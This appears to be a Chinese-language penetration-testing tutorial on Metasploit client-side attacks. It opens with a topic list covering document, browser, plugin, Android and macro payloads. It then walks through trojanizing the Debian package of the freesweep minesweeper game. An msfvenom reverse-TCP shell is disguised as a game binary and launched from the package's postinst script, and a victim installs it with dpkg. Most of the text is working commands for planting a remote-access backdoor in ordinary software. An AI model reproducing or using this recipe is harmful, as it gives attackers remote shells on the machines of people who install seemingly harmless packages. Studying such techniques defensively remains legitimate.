1. 簡介
2. 攻擊 windows
3. 攻擊 linux
4. 利用 acrobat reader 漏洞執行 payload
5. 利用 flash 外掛程式漏洞執行 paylaod
6. 利用 ie 瀏覽器漏洞執行 payload
7. 利用 jre 漏洞執行 payload
8. 生成 android 後門程式
9. 巨集感染
含有漏洞利用**的 web 站點
含有漏洞利用**的 doc、pdf等文件
誘騙被害者執行 payload
root@kali:~# apt-get --download-only install freesweep
root@kali:~# cd /var/cache/apt/archives/
root@kali:~# cp freesweep_0.90-3+b1_amd64.deb ~
root@kali:~# cd
root@kali:~# dpkg -x freesweep_0.90-3+b1_amd64.deb free
root@kali:~# cd free
root@kali:~/free# mkdir debian/
root@kali:~/free# cd debian/
root@kali:~/free/debian# vim control
package: freesweep
version: 0.90-3
section: games and amusement
priority: optional
maintainer: ubuntu motu developers (ubuntu-motu@ lists.ubuntu.com)
description: a text-based minesweeper
freesweep isan implementation of the popular minesweeper game,whereone tries to find all the mines without igniting any, based on hints givenby the computer.unlike most implementations of this game,freesweepworksinanyvisualtextdispl in linuxconsole,inanxterm,and inmost text-based terminals currently in use.
root@kali:~/free/debian# vim postinst
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
root@kali:~/free# chmod 755 postinst
# 生成 payload
root@kali:~/free/debiann# msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp lhost= lport=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_scores
root@kali:~/free/debian# dpkg-deb --build /root/free
# 受害者機器安裝此軟體
root@lamp:/home/kevin/desktop# dpkg -i free.deb
